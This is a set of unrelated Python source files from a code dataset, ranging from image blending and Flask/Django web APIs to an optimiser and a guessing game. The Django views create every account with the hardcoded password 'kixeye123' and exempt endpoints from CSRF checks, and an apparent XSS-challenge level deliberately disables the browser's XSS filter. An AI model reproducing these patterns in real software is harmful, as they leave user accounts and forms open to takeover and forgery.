+{"seq_id":"293500070","text":"# -*- coding: utf-8 -*-\r\n'''\n======================Welcome to Python====================\n/-********Have a good time.********-/\n\nFILE NAME:\nAUTHOR: Eden·Gabriel \nDATE: Dec-54-Thu/2018 12:14:58 \nVERSION: V-1.0\nDESCRIPTION:\nImage blending\n'''\n\nimport cv2\nimport numpy as np\n\napple = cv2.imread('E:\\\\A_BOOM_LEARNING_EDEN_GABRIEL\\\\2018.12.19start_opencv+python\\\\Images\\\\apple.jpg')\norange = cv2.imread('E:\\\\A_BOOM_LEARNING_EDEN_GABRIEL\\\\2018.12.19start_opencv+python\\\\Images\\\\orange.jpg')\n\nrow,col,sh = apple.shape\nrow1,col1,sh1 = orange.shape\n\nG = apple.copy()\ngpA = [G]\n# build the Gaussian pyramid for apple\nfor i in range(6):\n    G = cv2.pyrDown(G)\n    gpA.append(G)\n# build the Gaussian pyramid for orange\nG = orange.copy()\ngpB = [G]\nfor i in range(6):\n    G = cv2.pyrDown(G)\n    gpB.append(G)\n# build the Laplacian pyramid for apple\nlpA = [gpA[5]]\nfor i in range(5,0,-1):\n    GE = cv2.pyrUp(gpA[i])\n    L = cv2.subtract(gpA[i-1],GE)\n    lpA.append(L)\n# build the Laplacian pyramid for orange\nlpB = [gpB[5]]\nfor i in range(5,0,-1):\n    GE = cv2.pyrUp(gpB[i])\n    L = cv2.subtract(gpB[i-1],GE)\n    lpB.append(L)\n    \nLS = []\nfor la,lb in zip(lpA,lpB):\n    rows,cols,channels = la.shape\n    ls = np.hstack((la[:,0:cols//2],lb[:,cols//2:]))\n    LS.append(ls)\n\nls_ = LS[0]# LS[0] is the smallest image in the Gaussian pyramid\nfor i in range(1,6):\n    ls_ = cv2.pyrUp(ls_)\n    ls_ = cv2.add(ls_,LS[i])# blend by rebuilding from the pyramid\n\n\nreal = np.hstack((apple[:,:cols//2],orange[:,cols//2:]))# plain side-by-side stitching\n\nls_new = cv2.resize(ls_,(400,400))\n#ls_gray = cv2.cvtColor(ls_,cv2.COLOR_BGR2GRAY)\ncv2.imshow('ls_new',ls_new)\ncv2.imshow('real',real)\ncv2.imshow('ls_',ls_)\n\nk = cv2.waitKey(0)&0xFF\nif k == 27:\n    cv2.destroyAllWindows()\n    \n","sub_path":"图像融合.py","file_name":"图像融合.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"404671826","text":"from app.core import core\n\nfrom flask import (\n    request,\n    jsonify,\n    current_app,\n)\n\nfrom app.core.models import User\nfrom app.core.schema import UserSchema\n\n\nclass JSONResponse:\n    status = 'success'\n    status_code = 200\n\n    def __init__(self, message, status_code=None, status=None):\n        self.message = message\n\n        if status is not None:\n            self.status = status\n\n        if status_code is not None:\n            self.status_code = status_code\n\n    @property\n    def jsonify(self):\n        with current_app.app_context():\n            return jsonify({\n                'message': self.message,\n                'status': self.status\n            }), self.status_code\n\n\n@core.route('/users', methods=['POST'])\ndef add_a_user():\n    raw = request.get_json()\n\n    schema = UserSchema(strict=True)\n    result = schema.load(raw)\n\n    if result.errors == {}:\n        user = User(**result.data)\n        user.save()\n\n        rv = JSONResponse(f'{user.email} was added!', 201)\n        return rv.jsonify\n","sub_path":"app/core/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"285999239","text":"# Standard imports\nimport datetime\nfrom dateutil import parser\nimport json\nimport pytz\n\n# Django imports\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect, render_to_response\nfrom django.template import RequestContext\nfrom django.views.decorators.csrf import csrf_exempt\n\n# Third party imports\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\n# Local imports\nfrom data_app.models import UserProfile, BattleLog\nfrom data_app.utils import modify_value_type, username_hash\n\n\n@api_view(['POST'])\ndef user_create(request):\n    \"\"\"API: Create user\"\"\"\n\n    # Create new user\n    if request.method == 'POST':\n        first = request.DATA['first']\n        last = request.DATA['last']\n        nickname = request.DATA['nickname']\n\n        users = User.objects.filter(first_name=first).filter(\n            last_name=last).filter(userprofile__nickname=nickname)\n\n        if len(users) == 0:\n            user = User.objects.create_user(\n                username=username_hash(first, last, nickname),\n                first_name=first,\n                last_name=last,\n                password='kixeye123')\n\n            user.save()\n            profile = UserProfile(user=user, nickname=nickname,\n                                  created=datetime.datetime.now(pytz.utc),\n                                  last_seen=datetime.datetime.now(pytz.utc))\n            profile.save()\n\n            # Return success\n            data = json.dumps({'error':False,\n                               'time':datetime.datetime.now().isoformat(),\n                               'userid':user.pk})\n            return Response(data=data, status=status.HTTP_201_CREATED,\n                            content_type='application/json')\n\n        # User with first, last , and nickname already exists\n        
else:\n\n # Return failure\n data = json.dumps(\n {'error':True,\n 'time':datetime.datetime.now(pytz.utc).isoformat(),\n 'msg':'A user with this first name, last name and nickname already exists.'})\n return Response(data=data, status=status.HTTP_409_CONFLICT,\n content_type='application/json')\n\n@api_view(['PUT'])\ndef user_modify(request, userid):\n \"\"\"API: Modify User\"\"\"\n\n users = User.objects.filter(pk=userid)\n\n # User not found\n if len(users) == 0:\n\n # Return failure\n data = json.dumps({'error':True,\n 'time':datetime.datetime.now(pytz.utc).isoformat(),\n 'msg':'A user with this user ID does not exist.'})\n return Response(data=data, status=status.HTTP_409_CONFLICT,\n content_type='application/json')\n\n # Modify existing user\n user = users[0]\n field = request.DATA['field']\n new_value_raw = request.DATA['value']\n attribute = field.lower().replace(\" \", \"_\")\n new_value = modify_value_type(attribute, new_value_raw)\n\n # Modify attribute in user object\n if field.lower() in ['first name', 'last name']:\n setattr(user, attribute, new_value)\n user.save()\n\n # Modify attribute in user profile object\n else:\n profile = UserProfile.objects.get(user=user)\n setattr(profile, attribute, new_value)\n profile.save()\n\n # Return success\n data = json.dumps({'error':False,\n 'time':datetime.datetime.now(pytz.utc).isoformat()})\n return Response(data=data, status=status.HTTP_200_OK,\n content_type='application/json')\n\n@api_view(['POST'])\ndef battle_log_create(request):\n \"\"\"API: Create battle log\"\"\"\n\n attacker_userid = request.DATA['attacker']\n defender_userid = request.DATA['defender']\n winner_userid = request.DATA['winner']\n battle_start_time = request.DATA['start']\n battle_end_time = request.DATA['end']\n\n attackers = User.objects.filter(pk=attacker_userid)\n if len(attackers) == 0:\n\n # Return failure if attacker does not exist\n data = json.dumps({'error':True,\n 'time':datetime.datetime.now(pytz.utc).isoformat(),\n 'msg':'An attacker with this user ID does not exist.'})\n return Response(data=data, status=status.HTTP_409_CONFLICT,\n content_type='application/json')\n\n defenders = User.objects.filter(pk=defender_userid)\n if len(defenders) == 0:\n\n # Return failure if defender does not exist\n data = json.dumps({'error':True,\n 'time':datetime.datetime.now(pytz.utc).isoformat(),\n 'msg':'A defender with this user ID does not exist.'})\n return Response(data=data, status=status.HTTP_409_CONFLICT,\n content_type='application/json')\n\n winners = User.objects.filter(pk=winner_userid)\n if len(winners) == 0:\n\n # Return failure if winner does not exist\n data = json.dumps({'error':True,\n 'time':datetime.datetime.now(pytz.utc).isoformat(),\n 'msg':'A winner with this user ID does not exist.'})\n return Response(data=data, status=status.HTTP_409_CONFLICT,\n content_type='application/json')\n\n attacker = attackers[0]\n defender = defenders[0]\n winner = winners[0]\n\n try:\n battle_start_time_formatted = parser.parse(battle_start_time)\n except:\n\n # Return failure if start time could not be formatted\n data = json.dumps({'error':True,\n 'time':datetime.datetime.now(pytz.utc).isoformat(),\n 'msg':'Unable to parse battle start time.'})\n return Response(data=data, status=status.HTTP_409_CONFLICT,\n content_type='application/json')\n\n try:\n battled_end_time_formatted = parser.parse(battle_end_time)\n except:\n\n # Return failure if end time could not be formatted\n data = json.dumps({'error':True,\n 'time':datetime.datetime.now(pytz.utc).isoformat(),\n 
'msg':'Unable to parse battle end time.'})\n return Response(data=data, status=status.HTTP_409_CONFLICT,\n content_type='application/json')\n\n # Create Battle Log\n battle_log = BattleLog(attacker=attacker, defender=defender, winner=winner,\n start=battle_start_time_formatted,\n end=battled_end_time_formatted)\n battle_log.save()\n\n # Update wins, losses, current_win_streak - uncomment to activate\n \"\"\"\n profile_attacker = attacker.get_profile()\n profile_defender = defender.get_profile()\n\n if winner == attacker:\n profile_attacker.wins += 1\n profile_attacker.current_win_streak += 1\n profile_attacker.save()\n attacker.save()\n\n profile_defender.losses += 1\n if profile_defender.current_win_streak != 0:\n profile_defender.current_win_streak = 0\n profile_defender.save()\n defender.save()\n\n elif winner == defender:\n profile_defender.wins += 1\n profile_defender.current_win_streak += 1\n profile_defender.save()\n defender.save()\n\n profile_attacker.losses += 1\n if profile_attacker.current_win_streak != 0:\n profile_attacker.current_win_streak = 0\n profile_attacker.save()\n attacker.save()\n \"\"\"\n\n # Return success\n data = json.dumps({'error':False, 'time':datetime.datetime.now(pytz.utc).isoformat()})\n return Response(data=data, status=status.HTTP_200_OK,\n content_type='application/json')\n\n@csrf_exempt\ndef user_userid(request, userid):\n\n # API Modify User request\n if request.method == 'PUT':\n return user_modify(request, userid)\n\n # Get request for player data reporting\n elif request.method == 'GET':\n\n try:\n user = User.objects.get(pk=int(userid))\n profile = user.profile\n former_last_seen = profile.last_seen\n profile.last_seen = datetime.datetime.now(pytz.utc)\n profile.save()\n return render_to_response('user_profile.html',\n {'user': user,\n 'user_profile': user.profile,\n 'former_last_seen': former_last_seen},\n context_instance=RequestContext(request))\n\n # User not found\n except:\n return render_to_response('user_profile_does_not_exist.html',\n context_instance=RequestContext(request))\n\ndef user_search(request):\n \"\"\"Find user by nickname\"\"\"\n\n nickname = request.GET['nickname']\n users = User.objects.filter(userprofile__nickname__iexact=nickname)\n\n # Redirect to user profile if only one item is found\n if len(users) == 1:\n user = users[0]\n return redirect(\"/users/\" + str(user.id))\n\n # Display all users with links to profiles if more than one user is found\n user_tuples = []\n for user in users:\n user_tuples.append((user.first_name, user.last_name,\n user.profile.nickname, user.pk))\n\n return render_to_response('user_search.html',\n {'user_tuples': user_tuples},\n context_instance=RequestContext(request))\n\n@csrf_exempt\ndef battles(request):\n\n # API Create Battle Log request\n if request.method == 'POST':\n return battle_log_create(request)\n\n # GET request for battle start/end search\n elif request.method == 'GET':\n start_raw = request.GET['start']\n end_raw = request.GET['end']\n start_time = parser.parse(start_raw)\n end_time = parser.parse(end_raw)\n\n battle_logs = BattleLog.objects.filter(start__gt=start_time).filter(\n end__lt=end_time)\n\n return render_to_response('battle_log_search.html',\n {'battle_logs': battle_logs},\n context_instance=RequestContext(request))\n","sub_path":"apps/data_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"637701003","text":"from flask import Flask, 
render_template, request, redirect, url_for\r\nimport sqlite3\r\nfrom models import *\r\n\r\nimport os\r\nimport json\r\n\r\napp = Flask(__name__)\r\ninitialize_db()\r\n\r\n\r\n@app.route('/')\r\ndef home():\r\n\r\n return render_template(\"index.html\")\r\n\r\n\r\n@app.route('/results', methods=['POST'])\r\ndef results():\r\n\r\n search_term = request.form['tags'].lower().strip()\r\n\r\n drops = Drops.select().where(Drops.tags.contains(search_term))\r\n if not drops:\r\n return render_template('/results.html', no_drops = True,\r\n search_term=search_term)\r\n\r\n\r\n return render_template('/results.html', drops = drops,\r\n search_term=search_term)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"558955278","text":"from flask import Flask, request, render_template, make_response, Markup\r\nimport flask\r\n\r\napp = Flask(__name__)\r\n@app.route('/', methods=['GET'])\r\ndef render():\r\n arg = ''\r\n if request.method == 'GET':\r\n r = make_response(render_template('index-csp.html'))\r\n r.headers.set(\"X-XSS-Protection\", \"0\")\r\n r.headers['Content-Security-Policy'] = \"script-src 'self'\"\r\n return r\r\n\r\nif __name__=='__main__':\r\n app.run(debug=True)\r\n","sub_path":"level2/level-csp.py","file_name":"level-csp.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"311909571","text":"import sys\nimport shutil\nimport subprocess\nimport os\nimport urllib.request\nfrom zipfile import ZipFile\n\n# Requires installed: node, rustup, npm, 7z, nsis, vcpkg\n# VCPKG_ROOT has to be set\n# choco install nsis 7zip -y\ndef main():\n vcpkg = os.environ[\"VCPKG_ROOT\"]\n if not os.path.isdir(vcpkg):\n print(\"VCPKG_ROOT not set or invalid!\")\n return\n\n # Install libsndfile\n print(\"Installing libsndfile...\")\n subprocess.check_output([\"vcpkg\", \"install\", \"libsndfile:x64-windows-static\"], shell=True)\n\n # Compile UI\n print(\"Compiling UI...\")\n if not os.path.isfile(\"client\\\\dist\\\\dist.html\"):\n subprocess.check_output([\"npm\", \"i\"], shell=True, cwd='client')\n subprocess.check_output([\"npm\", \"run\", \"build\"], shell=True, cwd='client')\n\n # Generate output folders\n if os.path.isdir(\"dist\"):\n shutil.rmtree(\"dist\")\n os.mkdir(\"dist\")\n\n # Compile Rust\n print(\"Compiling...\")\n subprocess.check_output([\"rustup\", \"install\", \"nightly\"], shell=True)\n subprocess.check_output([\"rustup\", \"override\", \"set\", \"nightly\"], shell=True)\n env = os.environ.copy()\n # For libsndfile\n env[\"PATH\"] = os.path.join(vcpkg, \"installed\", \"x64-windows-static\", \"lib\") + ';' + env[\"PATH\"]\n env[\"RUSTFLAGS\"] = \"-Ctarget-feature=+crt-static\"\n subprocess.check_output([\"cargo\", \"build\", \"--release\"], shell=True, env=env)\n\n # Copy CEF\n print(\"Copying output files...\")\n for i in os.listdir(\"target\\\\release\\\\build\"):\n if i.startswith(\"cef-sys-\"):\n if 'out' in os.listdir(os.path.join(\"target\\\\release\\\\build\", i)):\n d = os.path.join(\"target\\\\release\\\\build\", i, \"out\")\n for file in os.listdir(d):\n if file.endswith('.tar.bz2'):\n os.remove(os.path.join(d, file))\n continue\n shutil.copytree(d, \"dist\\\\unpacked\")\n break\n # Copy bin\n shutil.copy(\"target\\\\release\\\\onetagger.exe\", \"dist\\\\unpacked\")\n 
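# Hedged aside on the app.py record above (the Drops model comes from its models.py): peewee's Field.contains(term) compiles to a substring LIKE filter with the term wrapped in % wildcards, which is why the tag search matches anywhere in the column.\nquery = Drops.select().where(Drops.tags.contains('python'))\n# roughly: SELECT ... FROM drops WHERE (tags LIKE '%python%')\n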
shutil.copy(\"assets\\\\icon.ico\", \"dist\\\\unpacked\")\n\n # Generate output archive\n print(\"Generating archive...\")\n subprocess.check_output([\"7z\", \"a\", \"dist\\\\OneTagger-windows.7z\", \"-mmt8\", \"-mx9\", \"dist\\\\unpacked\"], shell=True)\n\n # Setup installer\n print(\"Generating installer...\")\n subprocess.check_output([\"C:\\\\Program Files (x86)\\\\NSIS\\\\makensis.exe\", \"assets\\\\installer.nsi\"], shell=True)\n \n\nif __name__ == '__main__':\n if sys.platform != \"win32\":\n print(\"Not Windows, exitting...\")\n exit(-1)\n\n main()","sub_path":"assets/compile-win.py","file_name":"compile-win.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"261353792","text":"# -*- coding: utf-8 -*-\n\"\"\"\n#==============================================================================\n# SPIKE TEST - QARTOD\n#==============================================================================\n\n\nGetting the thresholds to flag condition and verifying the number of NaN\nwithin the variable values group.\n\n\n\n#==============================================================================\n# @author: fncsobral\n# @date : 12/sep/2016\n# @mod.1 : 02/Nov/2016 - FS \n - reorganization to DataFrame scheme.\n# @mod.2 : 10/may/2017 - FS\n - [getting_thrshld]: vrb_values now has more values [6, before \n were 3] and lw and hg limits was amplified, based on the \n timeseries experience.\n#==============================================================================\n\"\"\"\n\nimport numpy as np\n\n#==============================================================================\n# \n#==============================================================================\ndef getting_thrshld(vrb_values):\n '''\n This function will give the high and low THRESHOLDS as a first guess to \n the values. They should be improved later.\n \n INPUT\n - \n RETURN\n - \n '''\n \n # lw = np.std([vrb_values[0], vrb_values[2]])\n \n # Removing Tn from the group data. Needs to convert to list \n vrb_values2 = np.delete(vrb_values.tolist(), 1)\n \n STD = np.std(vrb_values2) \n lw = STD * 2\n hg = STD * 3\n\n # Storing results\n THRSHLD = lw, hg\n \n return THRSHLD\n#==============================================================================\n# \n#==============================================================================\ndef ver_nghbr_nan(vrb_values):\n '''\n This script will verify if DATA_NEIGHBORS\n contains a NAN. 
If afirmative, flag 2 will\n be given, meaning that was not possible to\n evaluate.\n \n INPUT\n - DATA_LST: group of three data to verify in the future spike test.\n \n RETURN\n - FLAG : flag 2 if NaN is present.\n\n @date:26/sep/2016\n '''\n \n # If any of data is NaN\n fd_dt_nan = np.isnan(vrb_values)\n if np.any(fd_dt_nan): \n # If data analyzed is NaN, FLAG=9 \n if fd_dt_nan[0]: \n flag_nghbr = 9\n # If any of the neighbors is NaN, FLAG=2\n elif (fd_dt_nan[0] or fd_dt_nan[2]) and not fd_dt_nan[1]:\n flag_nghbr = 2 \n else:\n flag_nghbr = 0\n else:\n flag_nghbr = 0\n # print('Data is OK.', ' - [aux_spike.py]')\n \n return flag_nghbr\n\n#==============================================================================\n# END\n#==============================================================================","sub_path":"3.spike/aux_spike.py","file_name":"aux_spike.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"147079092","text":"# encoding: utf-8\r\n\r\nimport numpy as np\r\nimport fcts\r\nimport random\r\nimport copy\r\nimport matplotlib.pyplot as plt\r\nimport time\r\n\r\n\r\ndef f1(b):\r\n p = np.array(b) / 100000\r\n s = b[0] * p[0]\r\n for x in [1, 2, 3, 4]:\r\n s += np.sum(b[:(x + 1)]) * (1 - np.sum(p[:x])) * p[x]\r\n s += (np.sum(b[:5]) + 100000) * (1 - np.sum(p[:5]))\r\n return s\r\n\r\n\r\nclass DEIndividual:\r\n\r\n '''\r\n individual of differential evolution algorithm\r\n '''\r\n\r\n def __init__(self, fct, vardim, bound):\r\n '''\r\n vardim: dimension of variables\r\n bound: boundaries of variables\r\n '''\r\n self.vardim = vardim\r\n self.bound = bound\r\n self.fitness = 0.\r\n self.fct = fct\r\n\r\n def generate(self):\r\n '''\r\n generate a random chromsome for differential evolution algorithm\r\n '''\r\n len = self.vardim\r\n rnd = np.random.random(size=len)\r\n self.chrom = np.zeros(len)\r\n for i in range(0, len):\r\n self.chrom[i] = self.bound[0, i] + \\\r\n (self.bound[1, i] - self.bound[0, i]) * rnd[i]\r\n\r\n def calculateFitness(self):\r\n '''\r\n calculate the fitness of the chromsome\r\n '''\r\n self.fitness = -self.fct(self.chrom)\r\n\r\n\r\nclass DifferentialEvolutionAlgorithm:\r\n\r\n '''\r\n The class for differential evolution algorithm\r\n '''\r\n\r\n def __init__(self, fct, sizepop, vardim, bound, MAXGEN, params):\r\n '''\r\n sizepop: population sizepop\r\n vardim: dimension of variables\r\n bound: boundaries of variables\r\n MAXGEN: termination condition\r\n param: algorithm required parameters, it is a list which is consisting of [crossover rate CR, scaling factor F]\r\n '''\r\n self.sizepop = sizepop\r\n self.MAXGEN = MAXGEN\r\n self.vardim = vardim\r\n self.bound = bound\r\n self.population = []\r\n self.fitness = np.zeros((self.sizepop, 1))\r\n self.trace = np.zeros((self.MAXGEN, 2))\r\n self.params = params\r\n self.fct = fct\r\n\r\n def initialize(self):\r\n '''\r\n initialize the population\r\n '''\r\n for i in range(0, self.sizepop):\r\n ind = DEIndividual(self.fct, self.vardim, self.bound)\r\n ind.generate()\r\n self.population.append(ind)\r\n\r\n def evaluate(self, x):\r\n '''\r\n evaluation of the population fitnesses\r\n '''\r\n x.calculateFitness()\r\n\r\n def solve(self):\r\n '''\r\n evolution process of differential evolution algorithm\r\n '''\r\n SM = []\r\n self.t = 0\r\n self.initialize()\r\n for i in range(0, self.sizepop):\r\n self.evaluate(self.population[i])\r\n self.fitness[i] = self.population[i].fitness\r\n best = 
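# Hedged usage sketch for the aux_spike.py record above (sample values invented): getting_thrshld drops index 1 (Tn) before taking the standard deviation, and ver_nghbr_nan flags a three-point window.\nimport numpy as np\n\nwindow = np.array([10.1, 10.3, 10.2, 10.4, 9.9, 10.0])\nlw, hg = getting_thrshld(window)  # returns (2*std, 3*std) of the window minus index 1\nflag = ver_nghbr_nan(np.array([10.2, 10.1, np.nan]))  # -> 2, a neighbour is NaN\n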
np.max(self.fitness)\r\n bestIndex = np.argmax(self.fitness)\r\n self.best = copy.deepcopy(self.population[bestIndex])\r\n self.avefitness = np.mean(self.fitness)\r\n self.trace[self.t, 0] = (1 - self.best.fitness) / self.best.fitness\r\n self.trace[self.t, 1] = (1 - self.avefitness) / self.avefitness\r\n # print(\"Generation %d: optimal function value is: %f; average function value is %f\" % (\r\n # self.t, self.trace[self.t, 0], self.trace[self.t, 1]))\r\n while (self.t <= self.MAXGEN):\r\n for i in range(0, self.sizepop):\r\n vi = self.mutationOperation(i)\r\n ui = self.crossoverOperation(i, vi)\r\n xi_next = self.selectionOperation(i, ui)\r\n self.population[i] = xi_next\r\n for i in range(0, self.sizepop):\r\n self.evaluate(self.population[i])\r\n self.fitness[i] = self.population[i].fitness\r\n best = np.max(self.fitness)\r\n bestIndex = np.argmax(self.fitness)\r\n if best > self.best.fitness:\r\n self.best = self.population[bestIndex]\r\n if self.t % 20 == 0:\r\n print(self.t, ':', -best)\r\n SM.append(-best)\r\n self.t += 1\r\n '''\r\n # if abs(best)<1e-15:\r\n # break\r\n self.avefitness = np.mean(self.fitness)\r\n self.trace[self.t, 0] = (1 - self.best.fitness) / self.best.fitness\r\n self.trace[self.t, 1] = (1 - self.avefitness) / self.avefitness\r\n\r\n #print(\"Generation %d: optimal function value is: %f; average function value is %f\" % (\r\n # self.t, self.trace[self.t, 0], self.trace[self.t, 1]))\r\n '''\r\n print(\"Optimal function value is: %f; \" %\r\n self.best.fitness)\r\n print(\"Optimal solution is:\")\r\n print(self.best.chrom)\r\n return SM\r\n # self.printResult()\r\n\r\n def selectionOperation(self, i, ui):\r\n '''\r\n selection operation for differential evolution algorithm\r\n '''\r\n xi_next = copy.deepcopy(self.population[i])\r\n xi_next.chrom = ui\r\n self.evaluate(xi_next)\r\n if xi_next.fitness > self.population[i].fitness:\r\n return xi_next\r\n else:\r\n return self.population[i]\r\n\r\n def crossoverOperation(self, i, vi):\r\n '''\r\n crossover operation for differential evolution algorithm\r\n '''\r\n k = np.random.random_integers(0, self.vardim - 1)\r\n ui = np.zeros(self.vardim)\r\n for j in range(0, self.vardim):\r\n pick = random.random()\r\n if pick < self.params[0] or j == k:\r\n ui[j] = vi[j]\r\n else:\r\n ui[j] = self.population[i].chrom[j]\r\n return ui\r\n\r\n def mutationOperation(self, i):\r\n '''\r\n mutation operation for differential evolution algorithm\r\n '''\r\n a = np.random.random_integers(0, self.sizepop - 1)\r\n while a == i:\r\n a = np.random.random_integers(0, self.sizepop - 1)\r\n b = np.random.random_integers(0, self.sizepop - 1)\r\n while b == i or b == a:\r\n b = np.random.random_integers(0, self.sizepop - 1)\r\n c = np.random.random_integers(0, self.sizepop - 1)\r\n while c == i or c == b or c == a:\r\n c = np.random.random_integers(0, self.sizepop - 1)\r\n vi = self.population[c].chrom + self.params[1] * \\\r\n (self.population[a].chrom - self.population[b].chrom)\r\n for j in range(0, self.vardim):\r\n if vi[j] < self.bound[0, j]:\r\n vi[j] = self.bound[0, j]\r\n if vi[j] > self.bound[1, j]:\r\n vi[j] = self.bound[1, j]\r\n return vi\r\n\r\n def printResult(self):\r\n '''\r\n plot the result of the differential evolution algorithm\r\n '''\r\n x = np.arange(0, self.MAXGEN)\r\n y1 = self.trace[:, 0]\r\n y2 = self.trace[:, 1]\r\n plt.plot(x, y1, 'r', label='optimal value')\r\n plt.plot(x, y2, 'g', label='average value')\r\n plt.xlabel(\"Iteration\")\r\n plt.ylabel(\"function value\")\r\n plt.title(\"Differential Evolution 
Algorithm for function optimization\")\r\n plt.legend()\r\n plt.show()\r\n\r\nif __name__ == \"__main__\":\r\n # bound = np.tile([[-10], [10]], 30)abs\r\n s = time.clock()\r\n bound = np.tile([[-600], [600]], 30)\r\n # dea = DifferentialEvolutionAlgorithm(\r\n # fcts.Rlevy, 120, 30, bound, 1000, [5, 0.6])\r\n dea = DifferentialEvolutionAlgorithm(\r\n fcts.sphere, 100, 30, bound, 600, [0.9, 0.6])\r\n dea.solve()\r\n print(time.clock() - s)\r\n","sub_path":"在聚类中的应用/dea.py","file_name":"dea.py","file_ext":"py","file_size_in_byte":7466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"508087509","text":"import random\nfrom colors import *\n\nsmall_numbers = [1, 2, 3]\n\ntry:\n \n print(red(\"Enter the number of tries:\"))\n\n number_of_retries = input()\n number_of_retries_list = []\n for i in range(1, int(number_of_retries)):\n number_of_retries_list.insert(0, '0')\n\n print(red(\"Enter the range of Guessing:\"))\n\n insert = input() # the insert of the player\n insert = insert.split(\" \")\n\n first = int(insert[0]) # the first number of the guessing range\n second = int(insert[1]) # the second number of the guessing range\n\n guessing_numbers = range(first, second) # the guessing range\n number = random.choice(guessing_numbers) # the random number that the player should guess\n # the player's guess of the number\n for i in number_of_retries_list:\n small_guess = random.choice(small_numbers)\n small_guess_2 = random.choice(small_numbers)\n try_1 = input()\n if int(try_1) == number: # Tells the player that he/she guessed right\n print(red(\"Congratulations You got it right\"))\n break\n elif first > second: # Tells the player that second must be greater than first\n print(red(\"Second number should be greater than first number\"))\n continue\n elif second - first == 0: # Tells the player that second must be greater than first\n print(red(\"Second number should be greater than first number\"))\n continue\n elif second < 0 or first < 0: # Tells the player that there should be no negative number\n print(red(\"There should be no negative numbers\"))\n continue\n elif 1 == second - first: # Tells the player the random number\n print(red(\"Number is \" + str(number)))\n print(red(\"Stupid\"))\n break\n elif 1 < second - first < 6 and ((second - 1) - (first + 1)) != 0 and number in range((first+1), (second-1)):\n # Acts on numbers of difference between 1 and 6\n print(red(\"Number is between \" + str(first + 1) + \" \" + str(second - 1))) # Gives the player a hint\n first = first + 1\n second = second - 1\n continue\n elif second - first == 6 and number in range((first+2), (second-2)):\n # Acts if the difference between the numbers is 6\n print(red(\"Number is between \" + str(first + 2) + \" \" + str(second - 2)))\n first = first + 2\n second = second - 2\n continue\n elif 7 == second - first and number in range((first+1), (second-1)):\n # Acts if the difference between the numbers is 7\n print(red(\"Number is between \" + str(first + 1) + \" \" + str(second - 2)))\n first = first + 1\n second = second - 2\n continue\n elif 7 < second - first < 10 and number in range((first+small_guess), (second-small_guess_2)):\n # Acts if the difference between the two numbers is between 7 and 10\n print(red(\"Number is between \" + str(first + small_guess) + \" \" + str(second - small_guess_2)))\n first = first + small_guess\n second = second - small_guess_2\n continue\n elif 10 == second - first and number in range((first + 3), (second - 3)):\n # Acts if 
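# Portability note on the dea.py record above; the replacements below are suggestions, not part of the original: np.random.random_integers was deprecated long ago and has since been removed from NumPy, and time.clock was removed in Python 3.8.\nimport time\nimport numpy as np\n\ni = np.random.randint(0, 10)  # high bound is exclusive, so this matches random_integers(0, 9)\nt0 = time.perf_counter()  # modern stand-in for time.clock()\n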
the difference between the two numbers is 10\n print(red(\"Number is between \" + str(first + 3) + \" \" + str(second - 3)))\n first = first + 3\n second = second - 3\n continue\n else: # Acts if the loop ends\n print(red(\"\\nThe number is \" + str(number)))\n\n\nexcept ValueError:\n print(red(\"Insert digits ONLY\"))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"48670089","text":"# Software Carpentry\r\n# Lazor Project\r\n# Group 5\r\n\r\n'''\r\nThis file is responsible for printing the solution board\r\nThe result is a .txt file containing the answer\r\n'''\r\n\r\nfrom copy import deepcopy\r\nimport datetime\r\n\r\n\r\ndef text_soln(filename, initGrid, soln, tries, possible, runtime):\r\n '''\r\n Write the solution board to a file with some other information\r\n\r\n **Parameters**\r\n\r\n filename: string\r\n The name of the board we are solving\r\n initGrid: list\r\n A list of lists; the given empty problem board\r\n soln: dictionary\r\n A dictionary containing the positions of the pieces\r\n for the solution board. Keys are the coordinates,\r\n values are the block type at the coordinates\r\n tries: int\r\n The number of tries it took to find the answer\r\n possible: int\r\n The number of possible boards that could have been\r\n made from the inputs\r\n runtime: float\r\n The amount of time it took to get the answer\r\n\r\n **Returns**\r\n\r\n NOTHING\r\n '''\r\n\r\n fname = filename.split('.')[0]\r\n\r\n solnGrid = deepcopy(initGrid)\r\n for i in soln.keys():\r\n solnGrid[i[1]][i[0]] = soln[i]\r\n\r\n f = open(fname + '_solution.txt', 'w')\r\n\r\n f.write('Software Carpentry Lazor Project - Group 5\\n')\r\n f.write(str(datetime.datetime.now()))\r\n f.write('\\nPuzzle: ' + fname + '\\n \\n')\r\n\r\n f.write('Given board: \\n')\r\n for i in initGrid:\r\n line = ' '.join(i)\r\n line = line + '\\n'\r\n f.write(line)\r\n\r\n f.write('\\nSolution board: \\n')\r\n for i in solnGrid:\r\n line = ' '.join(i)\r\n line = line + '\\n'\r\n f.write(line)\r\n\r\n f.write('\\n%d guesses were made out of a possible %d boards.\\n' % (tries, possible))\r\n f.write('Finding this solution took %f seconds.\\n' % (runtime))\r\n f.write('Thanks for playing!\\n')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n 